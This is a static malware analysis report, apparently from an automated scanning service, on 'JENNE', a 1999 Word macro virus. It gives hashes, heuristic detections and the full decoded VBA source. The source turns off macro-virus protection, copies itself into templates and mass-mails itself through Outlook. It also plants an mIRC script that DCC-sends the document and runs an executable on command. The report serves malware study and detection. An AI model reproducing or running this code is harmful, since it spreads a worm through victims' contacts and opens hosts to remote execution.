Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c4206a8c1f44f07d…

MALICIOUS

Office (OLE)

49.0 KB Created: 1999-11-23 20:11:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3874361f876d23092c8c1238bd999658 SHA-1: 1e83c55617d2348557e9073b16cd83d08a0e8f22 SHA-256: c4206a8c1f44f07d45ef09b075f798c89b47259e465d457eafc23e3f2e90b06f
356 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains legacy WordBasic macro virus markers and a VBA AutoOpen macro that attempts to export itself as 'C:\JENNE.drv'. It then saves the document to 'C:\Windows\JENNE\JENNE.doc' and creates a configuration file 'C:\Jenne.ini' which appears to be for aircdc or similar IRC-based botnet client, suggesting an attempt to establish persistence and potentially C2 communication.

Heuristics 8

  • ClamAV: Win.Trojan.U-74 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.U-74
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATION
    VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature.
    Matched line in script
         Set Fire = JENNEF.CreateItem(0)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set JENNEF = CreateObject("Outlook.Application")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5728 bytes
SHA-256: 88f02ba5a2ea21503c42089a5d3f8c117c139505f8186ce52b9b9821bdef689c
Detection
ClamAV: Win.Trojan.U-74
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JENNE"
Sub AutoOpen()

On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Application.EnableCancelKey = False
Application.VBE.ActiveVBProject.VBComponents("JENNE").Export ("C:\JENNE.drv")
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "JENNE" Then NormInstall = True
Next I
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "JENNE" Then ActiveInstall = True
Next I
If ActiveInstall = True And NormInstall = False Then Set firefox = NormalTemplate.VBProject Else
If ActiveInstall = False And NormInstall = True Then Set firefox = ActiveDocument.VBProject
firefox.VBComponents.Import ("C:\JENNE.drv")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
MkDir "C:\Windows\JENNE\"
ActiveDocument.SaveAs FileName:="C:\Windows\JENNE\JENNE.doc", FileFormat:=wdFormatDocument
Kill "C:\Jenne.ini"
Open "C:\Jenne.ini" For Output As #1
Print #1, "[SCRIPT]"
Print #1, ";JENNE SCRIPT - KEEP IT LOAD IF U WANNA BE SAFE"
Print #1, "n0=on 1:start:{"
Print #1, "n1= .remote on"
Print #1, "n2= .ctcps on"
Print #1, "n3= .events on"
Print #1, "n4= }"
Print #1, "n5=on 1:join:#:{"
Print #1, "n6=if ( $nick == $me ) { halt } | .dcc send $nick C:\Windows\Jenne\JENNE.doc"
Print #1, "n7= }"
Print #1, "n8=on 1:input:*:.msg #JENNE [( $+ $active $+ ) $1-]"
Print #1, "n9=on 1:text:*:?:.msg #JENNE [( $+ $active $+ )]"
Print #1, "n10=on 1:text:FIREJENNE:*://run $findfile(c:\,**.exe*,1)"
Close #1
Kill "C:\mirc\Script.ini"
SourceFile = "C:\Jenne.ini"
DestinationFile = "C:\mirc\Script.ini"
FileCopy SourceFile, DestinationFile
Kill "C:\Jenne.ini"
If Day(Now()) = 2 And Month(Now()) = 12 Then
MsgBox "Happy birthday Jenne-firefox^_^ Bad Ole Unca HeLLfiReZ still loves you xxxxxxxx", "Jenne-firefox^_^"
End If
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "JENNE") <> "Jenne-firefox" Then
 Set JENNEF = CreateObject("Outlook.Application")
 Set Nam = JENNEF.GetNameSpace("MAPI")
 If JENNEF = "Outlook" Then
  Nam.Logon "profile", "password"
    For y = 1 To Nam.AddressLists.Count
     Set Fox_ = Nam.AddressLists(y)
    x = 1
     Set Fire = JENNEF.CreateItem(0)
     For oo = 1 To Fox_.AddressEntries.Count
       Peep = Fox_.AddressEntries(x)
       Fire.Recipients.Add Peep
       x = x + 1
       If x > 70 Then oo = Fox_.AddressEntries.Count
    Next oo
 Fire.Subject = "Hi! it's" & Application.UserName
 Fire.Body = "Remember!!! On Dec99 the 2nd, she will be 35! Happy birthday Jenne-firefox^_^"
 Fire.Attachments.Add ThisDocument.FullName
 Fire.Send
 Peep = ""
 Next y
 Nam.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "JENNE") = "Jenne-firefox"
End If
End Sub


Sub ToolsMacro()
'V_Name = [Jenne-firefox^_^]
'Nhgube = [Qry_Nezt0_4_ArgFabbcre/UryySverm]
'Date   = [23nov99]
'Type   = [W97MacroVirus/Mirc_OutLook_Worm]
'Disclaim = [Happy birthday Jenne-firefox^_^ Bad Ole Unca HeLLfiReZ still loves you xxxxxxxx]
End Sub

Sub ViewVBCode()
MsgBox "No code tO see! ;)"
End Sub

Sub ToolsCustomize()
'
End Sub

Sub FileTemplates()
'
End Sub

Sub Jenne_FireFox()
'Happy birthday Jenne-firefox^_^ Bad Ole Unca HeLLfiReZ still loves you xxxxxxxx
End Sub

Sub FileSave()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Application.EnableCancelKey = False
Application.VBE.ActiveVBProject.VBComponents("JENNE").Export ("C:\JENNE.drv")
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "JENNE" Then NormInstall = True
Next I
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "JENNE" Then ActiveInstall = True
Next I
If ActiveInstall = True And NormInstall = False Then Set firefox = NormalTemplate.VBProject Else
If ActiveInstall = False And NormInstall = True Then Set firefox = ActiveDocument.VBProject
firefox.VBComponents.Import ("C:\JENNE.drv")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
MkDir "C:\Windows\JENNE\"
ActiveDocument.SaveAs FileName:="C:\Windows\JENNE\JENNE.doc", FileFormat:=wdFormatDocument
End Sub

Sub AutoClose()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Application.EnableCancelKey = False
Application.VBE.ActiveVBProject.VBComponents("JENNE").Export ("C:\JENNE.drv")
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "JENNE" Then NormInstall = True
Next I
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "JENNE" Then ActiveInstall = True
Next I
If ActiveInstall = True And NormInstall = False Then Set firefox = NormalTemplate.VBProject Else
If ActiveInstall = False And NormInstall = True Then Set firefox = ActiveDocument.VBProject
firefox.VBComponents.Import ("C:\JENNE.drv")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
MkDir "C:\Windows\JENNE\"
ActiveDocument.SaveAs FileName:="C:\Windows\JENNE\JENNE.doc", FileFormat:=wdFormatDocument
End Sub